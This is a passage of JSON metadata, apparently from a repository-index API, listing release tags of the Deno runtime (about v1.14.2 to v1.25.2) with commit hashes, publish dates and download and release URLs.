repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"